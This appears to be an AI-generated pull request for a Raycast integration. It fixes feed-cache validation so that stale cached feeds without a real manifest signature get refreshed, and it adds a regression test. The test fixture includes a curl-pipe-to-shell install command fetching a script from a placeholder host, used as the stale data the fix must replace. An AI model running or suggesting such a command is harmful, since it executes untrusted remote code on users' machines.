### PR TITLE
fix(raycast): refresh legacy feed caches

### DIFF
--- a/integrations/raycast/src/feed.ts
+++ b/integrations/raycast/src/feed.ts
@@ -414,9 +414,9 @@ export function parseFeedSnapshotMetadata(
     if (!isRecord(parsed)) return null;
 
     const generatedAt = optionalString(parsed.generatedAt);
-    const signature = optionalString(parsed.signature) || generatedAt;
+    const signature = optionalString(parsed.signature);
     const detailCacheNamespace =
-      optionalString(parsed.detailCacheNamespace) || signature;
+      optionalString(parsed.detailCacheNamespace) || signature || generatedAt;
     if (!signature && !generatedAt) return null;
 
     return {

--- a/integrations/raycast/src/runtime.ts
+++ b/integrations/raycast/src/runtime.ts
@@ -96,17 +96,12 @@ async function fetchRegistryManifestSnapshot(
 }
 
 function isSameFeedSnapshot(
-  cachedFeed: ParsedFeed,
   cachedMetadata: FeedSnapshotMetadata | null,
   manifestSnapshot: RegistryManifestSnapshot,
 ) {
-  if (cachedMetadata?.signature) {
-    return cachedMetadata.signature === manifestSnapshot.signature;
-  }
   return Boolean(
-    cachedFeed.generatedAt &&
-    manifestSnapshot.generatedAt &&
-    cachedFeed.generatedAt === manifestSnapshot.generatedAt,
+    cachedMetadata?.signature &&
+    cachedMetadata.signature === manifestSnapshot.signature,
   );
 }
 
@@ -179,7 +174,7 @@ export async function fetchFreshFeed(options: {
     if (
       cachedFeed.entries.length > 0 &&
       manifestSnapshot &&
-      isSameFeedSnapshot(cachedFeed, cachedMetadata, manifestSnapshot)
+      isSameFeedSnapshot(cachedMetadata, manifestSnapshot)
     ) {
       const metadata = buildFeedSnapshotMetadata(cachedFeed, manifestSnapshot);
       saveFeedSnapshotMetadata(options.cache, feedUrl, metadata);

--- a/integrations/raycast/test/feed.test.ts
+++ b/integrations/raycast/test/feed.test.ts
@@ -669,6 +669,65 @@ describe("Raycast feed helpers", () => {
     );
   });
 
+  it("refreshes pre-signature cached feeds even when generatedAt is unchanged", async () => {
+    const cache = new MemoryCache();
+    const devFeed = "https://preview.example.com/data/raycast-index.json";
+    cache.set(
+      feedCacheKey(devFeed),
+      JSON.stringify({
+        generatedAt: "2026-04-28T00:00:00.000Z",
+        entries: [
+          {
+            ...sampleEntry,
+            installCommand:
+              "curl -fsSL https://example.invalid/unsafe.sh | sh # OLD UNSAFE",
+          },
+        ],
+      }),
+    );
+
+    const requestedUrls: string[] = [];
+    const feed = await fetchFreshFeed({
+      cache,
+      feedUrl: devFeed,
+      fetchFn: async (input) => {
+        requestedUrls.push(String(input));
+        if (String(input).endsWith("/data/registry-manifest.json")) {
+          return response({
+            generatedAt: "2026-04-28T00:00:00.000Z",
+            artifactContracts: {
+              "raycast-index.json": {
+                path: "/data/raycast-index.json",
+                type: "json",
+                sha256: "fixed-feed-signature",
+              },
+            },
+          });
+        }
+        return response({
+          generatedAt: "2026-04-28T00:00:00.000Z",
+          entries: [
+            {
+              ...sampleEntry,
+              installCommand: "claude mcp add context7 --safe",
+            },
+          ],
+        });
+      },
+    });
+
+    assert.equal(feed.refreshStatus, "updated");
+    assert.equal(
+      feed.entries[0].installCommand,
+      "claude mcp add context7 --safe",
+    );
+    assert.deepEqual(requestedUrls, [registryManifestUrl(devFeed), devFeed]);
+    assert.equal(
+      JSON.parse(cache.get(feedMetadataCacheKey(devFeed)) || "{}").signature,
+      "fixed-feed-signature",
+    );
+  });
+
   it("skips the full Raycast feed when the manifest signature is unchanged", async () => {
     const cache = new MemoryCache();
     const devFeed = "https://preview.example.com/data/raycast-index.json";


### PR DESCRIPTION
### Motivation
- Prevent stale/untrusted Raycast feed content from being treated as current when a cached feed lacks a real manifest signature and only `generatedAt` matches the registry manifest.
- Preserve legacy metadata for detail-cache namespacing without promoting `generatedAt` into a trusted `signature` value.

### Description
- Require a real `signature` in cached feed metadata when comparing snapshots by changing `isSameFeedSnapshot` to only consider `cachedMetadata.signature` equality with the manifest signature (file `integrations/raycast/src/runtime.ts`).
- Stop synthesizing a signature from `generatedAt` when parsing stored metadata by updating `parseFeedSnapshotMetadata` to keep `signature` separate and set `detailCacheNamespace` to `signature || generatedAt` (file `integrations/raycast/src/feed.ts`).
- Add a regression test that simulates a pre-signature cached feed and verifies the code fetches the full feed and updates the manifest signature (file `integrations/raycast/test/feed.test.ts`).
- Update `fetchFreshFeed` to call the revised `isSameFeedSnapshot` helper and preserve existing detail-cache invalidation behavior when a true signature change is observed.

### Testing
- Ran unit tests with `node --import tsx --test test/feed.test.ts` inside `integrations/raycast` and all tests passed (25 tests, 0 failures).
- Ran TypeScript check with `./node_modules/.bin/tsc --noEmit` in `integrations/raycast` and it completed without errors.
- Checked formatting with `./node_modules/.bin/prettier --check integrations/raycast/src/runtime.ts integrations/raycast/src/feed.ts integrations/raycast/test/feed.test.ts` and it passed.
- Ran `git diff --check` to ensure no whitespace issues and it passed.
- Attempted `pnpm --dir integrations/raycast test` but it was blocked by the environment/Corepack being unable to download `pnpm@11.4.0` (network/proxy 403), so that invocation could not be executed in this environment.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a19e69f082c832ca1db91dab427c236)